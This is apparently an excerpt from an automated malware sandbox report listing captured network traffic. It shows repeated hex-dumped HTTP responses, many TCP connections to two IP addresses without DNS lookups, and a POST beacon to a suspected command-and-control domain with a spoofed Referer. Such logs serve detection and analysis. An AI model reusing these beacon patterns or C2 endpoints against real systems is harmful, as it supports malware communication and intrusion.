87 c1 7a c2 3c d9 21 4a 0b 2c 15 d1 e3 ab d9 a7 f0 bd 17 e3 ac ee 7a ed 27 be c5 ee 14 1e bb d7 33 0f 0b 5f 79 cd 53 e3 1c 84 b3 2c 56 d6 01 b1 96 84 67 6a fb 9a 2c 17 42 66 6a 07 c8 fe ed c1 47 ef 16 4b b4 a0 99 2e d0 18 65 22 ad 4b 40 32 80 b7 9c 32 62 96 1f 97 a7 d9 f6 56 89 29 8f 3d cc ad 9d 81 c8 73 c0 f6 dd 70 1d 36 32 9c 82 df 09 59 43 12 e7 12 de 72 6b a7 e5 77 66 c4 4a a6 20 a3 1b ec 73 21 e6 0c 22 41 94 91 63 8d 72 a2 d3 e2 48 94 95 e0 20 fc cf 82 fd 78 f7 86 f0 f0 e4 e3 8f 3f de de c0 3a 78 d5 98 f9 2a 80 a3 39 11 70 68 6f d3 b2 d2 b0 be 31 4b 67 cd 8f dd 77 6f 86 66 4b 33 b8 98 9d 7e 99 5e 4e bf 9d 4e 2f e3 93 6f 1f 2e 3e c7 bb 70 45 ee 2a 21 2d e1 1b d8 2d cc 22 78 65 5d 66 c5 17 e6 60 ff ed 6e 60 4d 71 10 07 e0 9e 0f 1a 32 31 a9 35 01 cb 65 ba f5 ba 63 e1 ce 66 52 2b 77 eb b5 fd 72 64 92 e8 5a 72 94 63 a6 88 39 f8 0f fe 9b 94 ed 8d 22 27 f1 e9 d0 e8 ad 11 f7 47 91 4b f6 51 22 b2 25 12 fc 4c e0 0c b2 aa 79 37 35 1c dc 0c 72 d8 a9 ed 9d 60 32 ca e8 2d a2 70 bf 90 b8 aa 88 34 81 66 cf 52 86 95 82 64 cb 5c e8 35 64 73 2a 71 9e 93 38 c1 9c 3b 6a b8 2c 86 93 11 f6 e9 1d 05 93 4e 49 c1 93 97 3c 51 d5 61 f7 33 59 02 c2 a1 e3 6c b8 ba 01 e1 34 38 09 00 90 96 73 04 4e f5 45 48 45 0d 02 26 e6 02 88 f3 00 61 06 c9 75 b2 c6 b6 86 d5 50 9a 1c 33 70 8c 2d 11 18 b3 66 14 c7 b7 b1 a9 6c 16 53 af 73 61 ea 9a 6a 8f db 2b ef 1b 73 1b 53 4d ca 2e ca c8 c3 34 32 29 cf c8 5d 9c d6 52 da 84 69 b1 16 50 7b 1d 20 8f 64 ed 6f 93 8a c6 57 49 bd 0c a1 Data Ascii:
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 30 Nov 2023 10:22:45 GMTServer: Apache/2.4.57 (Ubuntu)Expires: Thu, 19 Nov 1981 08:52:00 GMTLast-Modified: Thu, 30 Nov 2023 10:22:45 +0000Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0Pragma: no-cacheVary: Accept-EncodingContent-Encoding: gzipContent-Length: 1625Content-Type: text/html; charset=UTF-8Data Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 57 5b 53 db 38 14 7e 4e 7e 85 ea 87 02 d3 3a 26 b0 bd 0c 24 d9 6d 21 a5 cc 50 ca 94 30 dd 9d e9 8c 47 b6 e5 58 45 96 8c 24 13 32 db fd ef 7b 74 b1 e3 00 29 30 6d a2 cb b9 7c e7 e8 dc 32 7a 71 fc f5 68 f6 cf c5 14 15 ba 64 e8 e2 ea e3 d9 e9 11 0a c2 28 fa be 7f 14 45 c7 b3 63 f4 f7 e7 d9 97 33 34 1c ec a2 4b 2d 69 aa a3 68 7a 1e a0 a0 d0 ba 3a 88 a2 c5 62 31 58 ec 0f 84 9c 47 b3 6f d1 9d 91 32 34 6c 7e 19 2a cb 33 c8 74 16 4c fa 23 73 36 e9 f7 47 2f c2 10 2d 55 19 a1 30 9c b8 5d 51 b3 41 2a 06 f5 b5 3d 02 4a 82 b3 49 bf 37 d2 54 33 32 f9 4e 58 2a 4a 82 b4 40 9f af ce 1c e1 28 72 77 40 54 12 8d 91 01 14 92 9b 9a de 8e 03 5a e2 39 d1 42 b0 04 cb 00 a5 82 6b c2 f5 38 e0 22 40 91 61 60 94 5f 23 49 d8 38 50 7a c9 88 2a 08 d1 01 d2 cb 8a 8c 03 4d ee 74 94 2a 15 a0 42 92 bc a1 88 12 ac c8 c0 1e 47 ad 4a 8e 4b 60 c8 88 4a 25 ad 34 15 3c 40 0c f3 f9 38 20 bc a3 75 65 da 2f 74 49 b0 4c 0b 94 0b 89 c8 2d 91 4b 5d 50 3e 37 c6 1b 34 58 93 ac 2b be 6b d1 85 c4 f3 12 af d9 12 a6 38 2d c8 26 86 e9 5d 45 25 51 1d 8e 70 b8 89 f6 c8 91 84 33 70 40 87 c1 7a c2 3c d9 21 4a 0b 2c 15 d1 e3 ab d9 a7 f0 bd 17 e3 ac ee 7a ed 27 be c5 ee 14 1e bb d7 33 0f 0b 5f 79 cd 53 e3 1c 84 b3 2c 56 d6 01 b1 96 84 67 6a fb 9a 2c 17 42 66 6a 07 c8 fe ed c1 47 ef 16 4b b4 a0 99 2e d0 18 65 22 ad 4b 40 32 80 b7 9c 32 62 96 1f 97 a7 d9 f6 56 89 29 8f 3d cc ad 9d 81 c8 73 c0 f6 dd 70 1d 36 32 9c 82 df 09 59 43 12 e7 12 de 72 6b a7 e5 77 66 c4 4a a6 20 a3 1b ec 73 21 e6 0c 22 41 94 91 63 8d 72 a2 d3 e2 48 94 95 e0 20 fc cf 82 fd 78 f7 86 f0 f0 e4 e3 8f 3f de de c0 3a 78 d5 98 f9 2a 80 a3 39 11 70 68 6f d3 b2 d2 b0 be 31 4b 67 cd 8f dd 77 6f 86 66 4b 33 b8 98 9d 7e 99 5e 4e bf 9d 4e 2f e3 93 6f 1f 2e 3e c7 bb 70 45 ee 2a 21 2d e1 1b d8 2d cc 22 78 65 5d 66 c5 17 e6 60 ff ed 6e 60 4d 71 10 07 e0 9e 0f 1a 32 31 a9 35 01 cb 65 ba f5 ba 63 e1 ce 66 52 2b 77 eb b5 fd 72 64 92 e8 5a 72 94 63 a6 88 39 f8 0f fe 9b 94 ed 8d 22 27 f1 e9 d0 e8 ad 11 f7 47 91 4b f6 51 22 b2 25 12 fc 4c e0 0c b2 aa 79 37 35 1c dc 0c 72 d8 a9 ed 9d 60 32 ca e8 2d a2 70 bf 90 b8 aa 88 34 81 66 cf 52 86 95 82 64 cb 5c e8 35 64 73 2a 71 9e 93 38 c1 9c 3b 6a b8 2c 86 93 11 f6 e9 1d 05 93 4e 49 c1 93 97 3c 51 d5 61 f7 33 59 02 c2 a1 e3 6c b8 ba 01 e1 34 38 09 00 90 96 73 04 4e f5 45 48 45 0d 02 26 e6 02 88 f3 00 61 06 c9 75 b2 c6 b6 86 d5 50 9a 1c 33 70 8c 2d 11 18 b3 66 14 c7 b7 b1 a9 6c 16 53 af 73 61 ea 9a 6a 8f db 2b ef 1b 73 1b 53 4d ca 2e ca c8 c3 34 32 29 cf c8 5d 9c d6 52 da 84 69 b1 16 50 7b 1d 20 8f 64 ed 6f 93 8a c6 57 49 bd 0c a1 ce a9 30 13 26 71 07 55 51 6d 02 70 9f 74 05 01 6e 90 b9 41 ee a6 71 cf
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 30 Nov 2023 10:22:47 GMTServer: Apache/2.4.57 (Ubuntu)Expires: Thu, 19 Nov 1981 08:52:00 GMTLast-Modified: Thu, 30 Nov 2023 10:22:47 +0000Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0Pragma: no-cacheSet-Cookie: PHPSESSID=r02spifaue948tivmononnamq4; path=/Vary: Accept-EncodingContent-Encoding: gzipContent-Length: 1625Content-Type: text/html; charset=UTF-8Data Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 57 5b 53 db 38 14 7e 4e 7e 85 ea 87 02 d3 3a 26 b0 bd 0c 24 d9 6d 21 a5 cc 50 ca 94 30 dd 9d e9 8c 47 b6 e5 58 45 96 8c 24 13 32 db fd ef 7b 74 b1 e3 00 29 30 6d a2 cb b9 7c e7 e8 dc 32 7a 71 fc f5 68 f6 cf c5 14 15 ba 64 e8 e2 ea e3 d9 e9 11 0a c2 28 fa be 7f 14 45 c7 b3 63 f4 f7 e7 d9 97 33 34 1c ec a2 4b 2d 69 aa a3 68 7a 1e a0 a0 d0 ba 3a 88 a2 c5 62 31 58 ec 0f 84 9c 47 b3 6f d1 9d 91 32 34 6c 7e 19 2a cb 33 c8 74 16 4c fa 23 73 36 e9 f7 47 2f c2 10 2d 55 19 a1 30 9c b8 5d 51 b3 41 2a 06 f5 b5 3d 02 4a 82 b3 49 bf 37 d2 54 33 32 f9 4e 58 2a 4a 82 b4 40 9f af ce 1c e1 28 72 77 40 54 12 8d 91 01 14 92 9b 9a de 8e 03 5a e2 39 d1 42 b0 04 cb 00 a5 82 6b c2 f5 38 e0 22 40 91 61 60 94 5f 23 49 d8 38 50 7a c9 88 2a 08 d1 01 d2 cb 8a 8c 03 4d ee 74 94 2a 15 a0 42 92 bc a1 88 12 ac c8 c0 1e 47 ad 4a 8e 4b 60 c8 88 4a 25 ad 34 15 3c 40 0c f3 f9 38 20 bc a3 75 65 da 2f 74 49 b0 4c 0b 94 0b 89 c8 2d 91 4b 5d 50 3e 37 c6 1b 34 58 93 ac 2b be 6b d1 85 c4 f3 12 af d9 12 a6 38 2d c8 26 86 e9 5d 45 25 51 1d 8e 70 b8 89 f6 c8 91 84 33 70 40 87 c1 7a c2 3c d9 21 4a 0b 2c 15 d1 e3 ab d9 a7 f0 bd 17 e3 ac ee 7a ed 27 be c5 ee 14 1e bb d7 33 0f 0b 5f 79 cd 53 e3 1c 84 b3 2c 56 d6 01 b1 96 84 67 6a fb 9a 2c 17 42 66 6a 07 c8 fe ed c1 47 ef 16 4b b4 a0 99 2e d0 18 65 22 ad 4b 40 32 80 b7 9c 32 62 96 1f 97 a7 d9 f6 56 89 29 8f 3d cc ad 9d 81 c8 73 c0 f6 dd 70 1d 36 32 9c 82 df 09 59 43 12 e7 12 de 72 6b a7 e5 77 66 c4 4a a6 20 a3 1b ec 73 21 e6 0c 22 41 94 91 63 8d 72 a2 d3 e2 48 94 95 e0 20 fc cf 82 fd 78 f7 86 f0 f0 e4 e3 8f 3f de de c0 3a 78 d5 98 f9 2a 80 a3 39 11 70 68 6f d3 b2 d2 b0 be 31 4b 67 cd 8f dd 77 6f 86 66 4b 33 b8 98 9d 7e 99 5e 4e bf 9d 4e 2f e3 93 6f 1f 2e 3e c7 bb 70 45 ee 2a 21 2d e1 1b d8 2d cc 22 78 65 5d 66 c5 17 e6 60 ff ed 6e 60 4d 71 10 07 e0 9e 0f 1a 32 31 a9 35 01 cb 65 ba f5 ba 63 e1 ce 66 52 2b 77 eb b5 fd 72 64 92 e8 5a 72 94 63 a6 88 39 f8 0f fe 9b 94 ed 8d 22 27 f1 e9 d0 e8 ad 11 f7 47 91 4b f6 51 22 b2 25 12 fc 4c e0 0c b2 aa 79 37 35 1c dc 0c 72 d8 a9 ed 9d 60 32 ca e8 2d a2 70 bf 90 b8 aa 88 34 81 66 cf 52 86 95 82 64 cb 5c e8 35 64 73 2a 71 9e 93 38 c1 9c 3b 6a b8 2c 86 93 11 f6 e9 1d 05 93 4e 49 c1 93 97 3c 51 d5 61 f7 33 59 02 c2 a1 e3 6c b8 ba 01 e1 34 38 09 00 90 96 73 04 4e f5 45 48 45 0d 02 26 e6 02 88 f3 00 61 06 c9 75 b2 c6 b6 86 d5 50 9a 1c 33 70 8c 2d 11 18 b3 66 14 c7 b7 b1 a9 6c 16 53 af 73 61 ea 9a 6a 8f db 2b ef 1b 73 1b 53 4d ca 2e ca c8 c3 34 32 29 cf c8 5d 9c d6 52 da 84 69 b1 16 50 7b 1d 20 8f 64 ed 6f 93 8a c6 57 49 bd 0c a1 Data Ascii:
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 30 Nov 2023 10:22:49 GMTServer: Apache/2.4.57 (Ubuntu)Expires: Thu, 19 Nov 1981 08:52:00 GMTLast-Modified: Thu, 30 Nov 2023 10:22:49 +0000Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0Pragma: no-cacheSet-Cookie: PHPSESSID=4ubp5hfv7s3oflhfo3au02ar32; path=/Vary: Accept-EncodingContent-Encoding: gzipContent-Length: 1625Content-Type: text/html; charset=UTF-8Data Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 57 5b 53 db 38 14 7e 4e 7e 85 ea 87 02 d3 3a 26 b0 bd 0c 24 d9 6d 21 a5 cc 50 ca 94 30 dd 9d e9 8c 47 b6 e5 58 45 96 8c 24 13 32 db fd ef 7b 74 b1 e3 00 29 30 6d a2 cb b9 7c e7 e8 dc 32 7a 71 fc f5 68 f6 cf c5 14 15 ba 64 e8 e2 ea e3 d9 e9 11 0a c2 28 fa be 7f 14 45 c7 b3 63 f4 f7 e7 d9 97 33 34 1c ec a2 4b 2d 69 aa a3 68 7a 1e a0 a0 d0 ba 3a 88 a2 c5 62 31 58 ec 0f 84 9c 47 b3 6f d1 9d 91 32 34 6c 7e 19 2a cb 33 c8 74 16 4c fa 23 73 36 e9 f7 47 2f c2 10 2d 55 19 a1 30 9c b8 5d 51 b3 41 2a 06 f5 b5 3d 02 4a 82 b3 49 bf 37 d2 54 33 32 f9 4e 58 2a 4a 82 b4 40 9f af ce 1c e1 28 72 77 40 54 12 8d 91 01 14 92 9b 9a de 8e 03 5a e2 39 d1 42 b0 04 cb 00 a5 82 6b c2 f5 38 e0 22 40 91 61 60 94 5f 23 49 d8 38 50 7a c9 88 2a 08 d1 01 d2 cb 8a 8c 03 4d ee 74 94 2a 15 a0 42 92 bc a1 88 12 ac c8 c0 1e 47 ad 4a 8e 4b 60 c8 88 4a 25 ad 34 15 3c 40 0c f3 f9 38 20 bc a3 75 65 da 2f 74 49 b0 4c 0b 94 0b 89 c8 2d 91 4b 5d 50 3e 37 c6 1b 34 58 93 ac 2b be 6b d1 85 c4 f3 12 af d9 12 a6 38 2d c8 26 86 e9 5d 45 25 51 1d 8e 70 b8 89 f6 c8 91 84 33 70 40 87 c1 7a c2 3c d9 21 4a 0b 2c 15 d1 e3 ab d9 a7 f0 bd 17 e3 ac ee 7a ed 27 be c5 ee 14 1e bb d7 33 0f 0b 5f 79 cd 53 e3 1c 84 b3 2c 56 d6 01 b1 96 84 67 6a fb 9a 2c 17 42 66 6a 07 c8 fe ed c1 47 ef 16 4b b4 a0 99 2e d0 18 65 22 ad 4b 40 32 80 b7 9c 32 62 96 1f 97 a7 d9 f6 56 89 29 8f 3d cc ad 9d 81 c8 73 c0 f6 dd 70 1d 36 32 9c 82 df 09 59 43 12 e7 12 de 72 6b a7 e5 77 66 c4 4a a6 20 a3 1b ec 73 21 e6 0c 22 41 94 91 63 8d 72 a2 d3 e2 48 94 95 e0 20 fc cf 82 fd 78 f7 86 f0 f0 e4 e3 8f 3f de de c0 3a 78 d5 98 f9 2a 80 a3 39 11 70 68 6f d3 b2 d2 b0 be 31 4b 67 cd 8f dd 77 6f 86 66 4b 33 b8 98 9d 7e 99 5e 4e bf 9d 4e 2f e3 93 6f 1f 2e 3e c7 bb 70 45 ee 2a 21 2d e1 1b d8 2d cc 22 78 65 5d 66 c5 17 e6 60 ff ed 6e 60 4d 71 10 07 e0 9e 0f 1a 32 31 a9 35 01 cb 65 ba f5 ba 63 e1 ce 66 52 2b 77 eb b5 fd 72 64 92 e8 5a 72 94 63 a6 88 39 f8 0f fe 9b 94 ed 8d 22 27 f1 e9 d0 e8 ad 11 f7 47 91 4b f6 51 22 b2 25 12 fc 4c e0 0c b2 aa 79 37 35 1c dc 0c 72 d8 a9 ed 9d 60 32 ca e8 2d a2 70 bf 90 b8 aa 88 34 81 66 cf 52 86 95 82 64 cb 5c e8 35 64 73 2a 71 9e 93 38 c1 9c 3b 6a b8 2c 86 93 11 f6 e9 1d 05 93 4e 49 c1 93 97 3c 51 d5 61 f7 33 59 02 c2 a1 e3 6c b8 ba 01 e1 34 38 09 00 90 96 73 04 4e f5 45 48 45 0d 02 26 e6 02 88 f3 00 61 06 c9 75 b2 c6 b6 86 d5 50 9a 1c 33 70 8c 2d 11 18 b3 66 14 c7 b7 b1 a9 6c 16 53 af 73 61 ea 9a 6a 8f db 2b ef 1b 73 1b 53 4d ca 2e ca c8 c3 34 32 29 cf c8 5d 9c d6 52 da 84 69 b1 16 50 7b 1d 20 8f 64 ed 6f 93 8a c6 57 49 bd 0c a1 Data Ascii:
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 30 Nov 2023 10:22:51 GMTServer: Apache/2.4.57 (Ubuntu)Expires: Thu, 19 Nov 1981 08:52:00 GMTLast-Modified: Thu, 30 Nov 2023 10:22:51 +0000Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0Pragma: no-cacheSet-Cookie: PHPSESSID=irufpb5s84jgopi3854qdchjq1; path=/Vary: Accept-EncodingContent-Encoding: gzipContent-Length: 1625Content-Type: text/html; charset=UTF-8Data Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 57 5b 53 db 38 14 7e 4e 7e 85 ea 87 02 d3 3a 26 b0 bd 0c 24 d9 6d 21 a5 cc 50 ca 94 30 dd 9d e9 8c 47 b6 e5 58 45 96 8c 24 13 32 db fd ef 7b 74 b1 e3 00 29 30 6d a2 cb b9 7c e7 e8 dc 32 7a 71 fc f5 68 f6 cf c5 14 15 ba 64 e8 e2 ea e3 d9 e9 11 0a c2 28 fa be 7f 14 45 c7 b3 63 f4 f7 e7 d9 97 33 34 1c ec a2 4b 2d 69 aa a3 68 7a 1e a0 a0 d0 ba 3a 88 a2 c5 62 31 58 ec 0f 84 9c 47 b3 6f d1 9d 91 32 34 6c 7e 19 2a cb 33 c8 74 16 4c fa 23 73 36 e9 f7 47 2f c2 10 2d 55 19 a1 30 9c b8 5d 51 b3 41 2a 06 f5 b5 3d 02 4a 82 b3 49 bf 37 d2 54 33 32 f9 4e 58 2a 4a 82 b4 40 9f af ce 1c e1 28 72 77 40 54 12 8d 91 01 14 92 9b 9a de 8e 03 5a e2 39 d1 42 b0 04 cb 00 a5 82 6b c2 f5 38 e0 22 40 91 61 60 94 5f 23 49 d8 38 50 7a c9 88 2a 08 d1 01 d2 cb 8a 8c 03 4d ee 74 94 2a 15 a0 42 92 bc a1 88 12 ac c8 c0 1e 47 ad 4a 8e 4b 60 c8 88 4a 25 ad 34 15 3c 40 0c f3 f9 38 20 bc a3 75 65 da 2f 74 49 b0 4c 0b 94 0b 89 c8 2d 91 4b 5d 50 3e 37 c6 1b 34 58 93 ac 2b be 6b d1 85 c4 f3 12 af d9 12 a6 38 2d c8 26 86 e9 5d 45 25 51 1d 8e 70 b8 89 f6 c8 91 84 33 70 40 87 c1 7a c2 3c d9 21 4a 0b 2c 15 d1 e3 ab d9 a7 f0 bd 17 e3 ac ee 7a ed 27 be c5 ee 14 1e bb d7 33 0f 0b 5f 79 cd 53 e3 1c 84 b3 2c 56 d6 01 b1 96 84 67 6a fb 9a 2c 17 42 66 6a 07 c8 fe ed c1 47 ef 16 4b b4 a0 99 2e d0 18 65 22 ad 4b 40 32 80 b7 9c 32 62 96 1f 97 a7 d9 f6 56 89 29 8f 3d cc ad 9d 81 c8 73 c0 f6 dd 70 1d 36 32 9c 82 df 09 59 43 12 e7 12 de 72 6b a7 e5 77 66 c4 4a a6 20 a3 1b ec 73 21 e6 0c 22 41 94 91 63 8d 72 a2 d3 e2 48 94 95 e0 20 fc cf 82 fd 78 f7 86 f0 f0 e4 e3 8f 3f de de c0 3a 78 d5 98 f9 2a 80 a3 39 11 70 68 6f d3 b2 d2 b0 be 31 4b 67 cd 8f dd 77 6f 86 66 4b 33 b8 98 9d 7e 99 5e 4e bf 9d 4e 2f e3 93 6f 1f 2e 3e c7 bb 70 45 ee 2a 21 2d e1 1b d8 2d cc 22 78 65 5d 66 c5 17 e6 60 ff ed 6e 60 4d 71 10 07 e0 9e 0f 1a 32 31 a9 35 01 cb 65 ba f5 ba 63 e1 ce 66 52 2b 77 eb b5 fd 72 64 92 e8 5a 72 94 63 a6 88 39 f8 0f fe 9b 94 ed 8d 22 27 f1 e9 d0 e8 ad 11 f7 47 91 4b f6 51 22 b2 25 12 fc 4c e0 0c b2 aa 79 37 35 1c dc 0c 72 d8 a9 ed 9d 60 32 ca e8 2d a2 70 bf 90 b8 aa 88 34 81 66 cf 52 86 95 82 64 cb 5c e8 35 64 73 2a 71 9e 93 38 c1 9c 3b 6a b8 2c 86 93 11 f6 e9 1d 05 93 4e 49 c1 93 97 3c 51 d5 61 f7 33 59 02 c2 a1 e3 6c b8 ba 01 e1 34 38 09 00 90 96 73 04 4e f5 45 48 45 0d 02 26 e6 02 88 f3 00 61 06 c9 75 b2 c6 b6 86 d5 50 9a 1c 33 70 8c 2d 11 18 b3 66 14 c7 b7 b1 a9 6c 16 53 af 73 61 ea 9a 6a 8f db 2b ef 1b 73 1b 53 4d ca 2e ca c8 c3 34 32 29 cf c8 5d 9c d6 52 da 84 69 b1 16 50 7b 1d 20 8f 64 ed 6f 93 8a c6 57 49 bd 0c a1 Data Ascii:
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 30 Nov 2023 10:22:53 GMTServer: Apache/2.4.57 (Ubuntu)Expires: Thu, 19 Nov 1981 08:52:00 GMTLast-Modified: Thu, 30 Nov 2023 10:22:53 +0000Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0Pragma: no-cacheSet-Cookie: PHPSESSID=sh8uclh22e0c7rjdupk6u5ss02; path=/Vary: Accept-EncodingContent-Encoding: gzipContent-Length: 1625Content-Type: text/html; charset=UTF-8Data Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 57 5b 53 db 38 14 7e 4e 7e 85 ea 87 02 d3 3a 26 b0 bd 0c 24 d9 6d 21 a5 cc 50 ca 94 30 dd 9d e9 8c 47 b6 e5 58 45 96 8c 24 13 32 db fd ef 7b 74 b1 e3 00 29 30 6d a2 cb b9 7c e7 e8 dc 32 7a 71 fc f5 68 f6 cf c5 14 15 ba 64 e8 e2 ea e3 d9 e9 11 0a c2 28 fa be 7f 14 45 c7 b3 63 f4 f7 e7 d9 97 33 34 1c ec a2 4b 2d 69 aa a3 68 7a 1e a0 a0 d0 ba 3a 88 a2 c5 62 31 58 ec 0f 84 9c 47 b3 6f d1 9d 91 32 34 6c 7e 19 2a cb 33 c8 74 16 4c fa 23 73 36 e9 f7 47 2f c2 10 2d 55 19 a1 30 9c b8 5d 51 b3 41 2a 06 f5 b5 3d 02 4a 82 b3 49 bf 37 d2 54 33 32 f9 4e 58 2a 4a 82 b4 40 9f af ce 1c e1 28 72 77 40 54 12 8d 91 01 14 92 9b 9a de 8e 03 5a e2 39 d1 42 b0 04 cb 00 a5 82 6b c2 f5 38 e0 22 40 91 61 60 94 5f 23 49 d8 38 50 7a c9 88 2a 08 d1 01 d2 cb 8a 8c 03 4d ee 74 94 2a 15 a0 42 92 bc a1 88 12 ac c8 c0 1e 47 ad 4a 8e 4b 60 c8 88 4a 25 ad 34 15 3c 40 0c f3 f9 38 20 bc a3 75 65 da 2f 74 49 b0 4c 0b 94 0b 89 c8 2d 91 4b 5d 50 3e 37 c6 1b 34 58 93 ac 2b be 6b d1 85 c4 f3 12 af d9 12 a6 38 2d c8 26 86 e9 5d 45 25 51 1d 8e 70 b8 89 f6 c8 91 84 33 70 40 87 c1 7a c2 3c d9 21 4a 0b 2c 15 d1 e3 ab d9 a7 f0 bd 17 e3 ac ee 7a ed 27 be c5 ee 14 1e bb d7 33 0f 0b 5f 79 cd 53 e3 1c 84 b3 2c 56 d6 01 b1 96 84 67 6a fb 9a 2c 17 42 66 6a 07 c8 fe ed c1 47 ef 16 4b b4 a0 99 2e d0 18 65 22 ad 4b 40 32 80 b7 9c 32 62 96 1f 97 a7 d9 f6 56 89 29 8f 3d cc ad 9d 81 c8 73 c0 f6 dd 70 1d 36 32 9c 82 df 09 59 43 12 e7 12 de 72 6b a7 e5 77 66 c4 4a a6 20 a3 1b ec 73 21 e6 0c 22 41 94 91 63 8d 72 a2 d3 e2 48 94 95 e0 20 fc cf 82 fd 78 f7 86 f0 f0 e4 e3 8f 3f de de c0 3a 78 d5 98 f9 2a 80 a3 39 11 70 68 6f d3 b2 d2 b0 be 31 4b 67 cd 8f dd 77 6f 86 66 4b 33 b8 98 9d 7e 99 5e 4e bf 9d 4e 2f e3 93 6f 1f 2e 3e c7 bb 70 45 ee 2a 21 2d e1 1b d8 2d cc 22 78 65 5d 66 c5 17 e6 60 ff ed 6e 60 4d 71 10 07 e0 9e 0f 1a 32 31 a9 35 01 cb 65 ba f5 ba 63 e1 ce 66 52 2b 77 eb b5 fd 72 64 92 e8 5a 72 94 63 a6 88 39 f8 0f fe 9b 94 ed 8d 22 27 f1 e9 d0 e8 ad 11 f7 47 91 4b f6 51 22 b2 25 12 fc 4c e0 0c b2 aa 79 37 35 1c dc 0c 72 d8 a9 ed 9d 60 32 ca e8 2d a2 70 bf 90 b8 aa 88 34 81 66 cf 52 86 95 82 64 cb 5c e8 35 64 73 2a 71 9e 93 38 c1 9c 3b 6a b8 2c 86 93 11 f6 e9 1d 05 93 4e 49 c1 93 97 3c 51 d5 61 f7 33 59 02 c2 a1 e3 6c b8 ba 01 e1 34 38 09 00 90 96 73 04 4e f5 45 48 45 0d 02 26 e6 02 88 f3 00 61 06 c9 75 b2 c6 b6 86 d5 50 9a 1c 33 70 8c 2d 11 18 b3 66 14 c7 b7 b1 a9 6c 16 53 af 73 61 ea 9a 6a 8f db 2b ef 1b 73 1b 53 4d ca 2e ca c8 c3 34 32 29 cf c8 5d 9c d6 52 da 84 69 b1 16 50 7b 1d 20 8f 64 ed 6f 93 8a c6 57 49 bd 0c a1 Data Ascii:

Source: unknown	TCP traffic detected without corresponding DNS query: 95.214.26.17
Source: unknown	TCP traffic detected without corresponding DNS query: 95.214.26.17
Source: unknown	TCP traffic detected without corresponding DNS query: 95.214.26.17
Source: unknown	TCP traffic detected without corresponding DNS query: 95.214.26.17
Source: unknown	TCP traffic detected without corresponding DNS query: 95.214.26.17
Source: unknown	TCP traffic detected without corresponding DNS query: 194.49.94.77
Source: unknown	TCP traffic detected without corresponding DNS query: 194.49.94.77
Source: unknown	TCP traffic detected without corresponding DNS query: 194.49.94.77
Source: unknown	TCP traffic detected without corresponding DNS query: 194.49.94.77
Source: unknown	TCP traffic detected without corresponding DNS query: 194.49.94.77
Source: unknown	TCP traffic detected without corresponding DNS query: 194.49.94.77
Source: unknown	TCP traffic detected without corresponding DNS query: 95.214.26.17
Source: unknown	TCP traffic detected without corresponding DNS query: 95.214.26.17
Source: unknown	TCP traffic detected without corresponding DNS query: 95.214.26.17
Source: unknown	TCP traffic detected without corresponding DNS query: 194.49.94.77
Source: unknown	TCP traffic detected without corresponding DNS query: 194.49.94.77
Source: unknown	TCP traffic detected without corresponding DNS query: 194.49.94.77
Source: unknown	TCP traffic detected without corresponding DNS query: 95.214.26.17
Source: unknown	TCP traffic detected without corresponding DNS query: 194.49.94.77
Source: unknown	TCP traffic detected without corresponding DNS query: 95.214.26.17
Source: unknown	TCP traffic detected without corresponding DNS query: 194.49.94.77
Source: unknown	TCP traffic detected without corresponding DNS query: 95.214.26.17
Source: unknown	TCP traffic detected without corresponding DNS query: 194.49.94.77
Source: unknown	TCP traffic detected without corresponding DNS query: 95.214.26.17
Source: unknown	TCP traffic detected without corresponding DNS query: 194.49.94.77
Source: unknown	TCP traffic detected without corresponding DNS query: 95.214.26.17
Source: unknown	TCP traffic detected without corresponding DNS query: 194.49.94.77
Source: unknown	TCP traffic detected without corresponding DNS query: 95.214.26.17
Source: unknown	TCP traffic detected without corresponding DNS query: 194.49.94.77
Source: unknown	TCP traffic detected without corresponding DNS query: 95.214.26.17
Source: unknown	TCP traffic detected without corresponding DNS query: 95.214.26.17
Source: unknown	TCP traffic detected without corresponding DNS query: 95.214.26.17
Source: unknown	TCP traffic detected without corresponding DNS query: 194.49.94.77
Source: unknown	TCP traffic detected without corresponding DNS query: 95.214.26.17
Source: unknown	TCP traffic detected without corresponding DNS query: 95.214.26.17
Source: unknown	TCP traffic detected without corresponding DNS query: 194.49.94.77
Source: unknown	TCP traffic detected without corresponding DNS query: 95.214.26.17
Source: unknown	TCP traffic detected without corresponding DNS query: 194.49.94.77
Source: unknown	TCP traffic detected without corresponding DNS query: 95.214.26.17
Source: unknown	TCP traffic detected without corresponding DNS query: 194.49.94.77
Source: unknown	TCP traffic detected without corresponding DNS query: 95.214.26.17
Source: unknown	TCP traffic detected without corresponding DNS query: 95.214.26.17
Source: unknown	TCP traffic detected without corresponding DNS query: 194.49.94.77
Source: unknown	TCP traffic detected without corresponding DNS query: 95.214.26.17
Source: unknown	TCP traffic detected without corresponding DNS query: 95.214.26.17
Source: unknown	TCP traffic detected without corresponding DNS query: 194.49.94.77
Source: unknown	TCP traffic detected without corresponding DNS query: 194.49.94.77
Source: unknown	TCP traffic detected without corresponding DNS query: 95.214.26.17
Source: unknown	TCP traffic detected without corresponding DNS query: 95.214.26.17
Source: unknown	TCP traffic detected without corresponding DNS query: 194.49.94.77

Source: unknown

HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rpkreoehjpwr.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 218Host: sumagulituyo.org

Source: unknown	HTTPS traffic detected: 104.21.79.229:443 -> 192.168.2.4:49740 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 198.50.191.95:443 -> 192.168.2.4:49756 version: TLS 1.2
